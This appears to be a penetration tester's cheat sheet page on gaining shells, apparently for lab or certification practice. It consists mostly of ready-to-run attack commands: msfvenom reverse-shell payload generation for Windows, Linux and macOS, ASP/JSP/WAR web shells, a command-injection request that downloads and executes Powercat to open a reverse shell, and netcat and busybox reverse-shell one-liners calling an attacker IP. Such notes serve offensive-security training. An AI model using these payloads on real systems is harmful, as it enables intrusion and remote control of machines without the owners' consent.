Shells

Pyminify — compresses Python scripts into one liners
RevShells — a collection of reverse shell payloads
/usr/share/webshells
exploit-db.com/exploits/ID

MSFvenom

Metasploit Unleashed | MSFvenomwww.offsec.com

Msfvenom

# Syntax
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

# Formats
msfvenom --list formats

# Non Staged
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.162 LPORT=4444 -f exe > reverse.exe
# 32 bit for X86-based
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.206 LPORT=4444 -f exe > reverse.exe

# Staged, doesn't work with nc
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.162 LPORT=4444 -f exe > reverse.exe

# Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.206 LPORT=4445 -f elf -o shell

# PS1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.111 LPORT=4445 -f ps1

# PSH
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.111 LPORT=4445 -f psh -o shell.ps1

# MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.45.111 LPORT=4445 -f macho > shell.macho

Powercat

# Powercat is a PowerShell implementation of Netcat
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80
nc -nvlp 4444

# Reverse Shell with Powercat
curl -X POST --data 'Archive=git;IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell' http://192.168.50.189:8000/archive

Web Shells

# PHP
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Other

# Machines may block certain ports, try using common ports as 80, 420, 443, 445
/bin/busybox nc 192.168.45.202 4444 -e bash
PHP Ivan Sinek Revshell

RCE > curl -o /nc64.exe http://192.168.45.196/nc64.exe
nc64.exe 192.168.45.196 4444 -e sh


# https://github.com/int0x33/nc.exe
rlwrap nc -lvnp 80
nc.exe 192.168.45.163 80 -e cmd.exe

PreviousLateral Movement AD NextTTYs

Last updated 6 months ago